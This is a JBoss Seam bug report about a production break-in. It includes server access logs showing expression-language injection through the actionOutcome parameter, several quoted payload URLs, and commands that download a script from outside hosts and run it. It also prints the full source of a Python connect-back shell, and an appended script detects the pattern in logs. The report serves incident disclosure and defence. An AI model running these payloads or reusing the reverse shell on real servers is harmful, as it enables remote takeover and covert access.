Seam 2
JBSEAM-4994

JBoss Seam remote execution vulnerability

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Duplicate Issue
    • Affects Version/s: 2.1.2.GA
    • Fix Version/s: None
    • Component/s: Security
    • Labels:
      None

      Description

      Recently discovered an exploit on our production server which appears to have allowed someone remote access to the user account set up for jboss.

      I have not found anything to show this has been reported previously. I have not yet reproduced and am working on fully understanding the exploit.

      == server.log ==
      2012-05-22 13:53:10,198 36426506 INFO [STDOUT] (ajp-0.0.0.0-8009-15 13:53:10,198 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24
      2012-05-22 13:53:16,595 36432903 INFO [STDOUT] (ajp-0.0.0.0-8009-15 13:53:16,595 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24

      == httpd.log with pertinent sections grouped ==
      /*
      115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 6677
      115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAcss/panel.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 561
      115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg/richfaces/renderkit/html/scripts/skinning.js HTTP/1.1" 200 1224
      115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/blueprint/screen.css HTTP/1.1" 200 4150
      115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/extranet.css HTTP/1.1" 200 10799
      115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/js/site.js HTTP/1.1" 200 539
      115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg.ajax4jsf.javascript.AjaxScript HTTP/1.1" 200 67842
      */

      115.238.137.24 - - [22/May/2012:13:52:54 -0700] "GET /*********/***/home.seam HTTP/1.1" 200 172555
      115.238.137.24 - - [22/May/2012:13:53:20 -0700] "GET /*********/***/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
      115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4033c82634&cid=1838 HTTP/1.1" 404 979

      /*
      115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /favicon.ico HTTP/1.1" 404 988
      */

      115.238.137.24 - - [22/May/2012:13:53:37 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'wget%20-O%20/tmp/back.py%20220.112.40.101/back.py')}null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
      115.238.137.24 - - [22/May/2012:13:53:38 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4051bc9d5bnull%29%2C+%27telnet+221.122.113.133+28%27%29%7D&cid=1841 HTTP/1.1" 404 979

      /*
      115.238.137.24 - - [22/May/2012:13:53:39 -0700] "GET /favicon.ico HTTP/1.1" 404 988
      */

      115.238.137.24 - - [22/May/2012:13:53:43 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'python%20/tmp/back.py%20221.122.113.133%2028')} HTTP/1.1" 302 -
      115.238.137.24 - - [22/May/2012:13:53:44 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%407724369d&cid=1844 HTTP/1.1" 404 979

      /*
      115.238.137.24 - - [22/May/2012:13:53:45 -0700] "GET /favicon.ico HTTP/1.1" 404 988
      */

      Discovered the following information on some searches

      == http://erro.sinaapp.com/?p=47 ==

      http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478

      http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6]}

      http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13]}

      http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'wget http://www.bitpress.com.cn/uploads/back.py -O /tmp/back.py')}

      http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'perl /tmp/back.py 118.122.176.42 53')}

      == back.py ==
      #!/usr/bin/python
      # Python 2 connect-back shell: wires a TCP socket to stdin/stdout/stderr
      # and spawns /bin/sh in a pty, with shell history disabled.
      import sys
      import os
      import socket
      import pty

      shell = "/bin/sh"

      def usage(programname):
          print "Python connect-back door"
          print "Usage: %s <conn_back_ip> <port>" % programname

      def main():
          if len(sys.argv) != 3:
              usage(sys.argv[0])
              sys.exit(1)
          s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          try:
              s.connect((socket.gethostbyname(sys.argv[1]), int(sys.argv[2])))
              print "[+]Connect OK."
          except:
              print "[-]Can't connect"
              sys.exit(2)
          # Redirect this process's stdin, stdout and stderr over the socket
          os.dup2(s.fileno(), 0)
          os.dup2(s.fileno(), 1)
          os.dup2(s.fileno(), 2)
          global shell
          # Unset history variables so the interactive session leaves no file on disk
          os.unsetenv("HISTFILE")
          os.unsetenv("HISTFILESIZE")
          pty.spawn(shell)
          s.close()

      if __name__ == "__main__":
          main()
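Detection logic for the httpd.log pattern in this report, added here as an example; it is not part of the report, of Seam, or of the linked blog post. It parses Apache common-log lines (the sample below is constructed from the entries in the description, with the same masked path and IPs), flags any actionOutcome value that carries an EL expression, pulls out the command string handed to Runtime.exec() and the remote hosts it names, and treats a later request whose pwned= parameter carries a java.lang.UNIXProcess@... value as confirmation that the expression was evaluated and the process was started. The regexes and the finding fields are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Constructed sample, modelled on the httpd.log entries in JBSEAM-4994 (not a live capture).
SAMPLE_LOG = r'''
115.238.137.24 - - [22/May/2012:13:52:54 -0700] "GET /*********/***/home.seam HTTP/1.1" 200 172555
115.238.137.24 - - [22/May/2012:13:53:20 -0700] "GET /*********/***/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4033c82634&cid=1838 HTTP/1.1" 404 979
115.238.137.24 - - [22/May/2012:13:53:37 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'wget%20-O%20/tmp/back.py%20220.112.40.101/back.py')}null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
10.0.0.5 - - [22/May/2012:13:53:40 -0700] "GET /home.seam?actionOutcome=/about.xhtml HTTP/1.1" 302 -
'''

# Apache common log format: client, identd, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+')

# Seam feeds actionOutcome to the EL engine, so any EL delimiter in it is hostile.
EL_RE = re.compile(r'[#$]\{')
# The command literal passed to Runtime.exec() in the reflection payloads seen above.
EXEC_RE = re.compile(r"invoke\([^,]*,\s*'([^']*)'\s*\)")
# Process.toString() echoed back in the redirect proves the expression ran.
PROC_RE = re.compile(r'java\.lang\.(?:UNIXProcess|ProcessImpl)@[0-9a-fA-F]+')
IP_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(line):
    """Return a finding dict for a hostile line, or None for a benign one."""
    rec = parse_line(line)
    if not rec:
        return None
    url = unquote(rec['url'])          # one decode, as the container does
    path, _, query = url.partition('?')
    if 'actionOutcome=' in query and EL_RE.search(query):
        cmd_m = EXEC_RE.search(query)
        cmd = cmd_m.group(1) if cmd_m else None
        return {'ip': rec['ip'], 'ts': rec['ts'], 'kind': 'el_injection',
                'path': path, 'command': cmd,
                'remote_hosts': sorted(set(IP_RE.findall(cmd or '')))}
    if PROC_RE.search(query):
        return {'ip': rec['ip'], 'ts': rec['ts'], 'kind': 'exec_confirmed',
                'path': path, 'command': None, 'remote_hosts': []}
    return None


def scan(log_text):
    """Run analyse() over every line and keep only the findings."""
    return [f for f in (analyse(l) for l in log_text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two points the output makes visible. The 302 is the interesting status: Seam evaluated the expression while building the redirect, so the process was already running before the 404 on /pwn.seam (a view the attacker never expected to exist). And the rule keys on an EL delimiter inside actionOutcome plus the exec() argument, not on getDeclaredMethods()[13] and [6]: the order of getDeclaredMethods() is not specified, so those indices differ between JVM builds and a signature tied to them misses the same attack against a different runtime.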

                People

                • Assignee: Unassigned
                • Reporter: kevineliuk Kevin Eliuk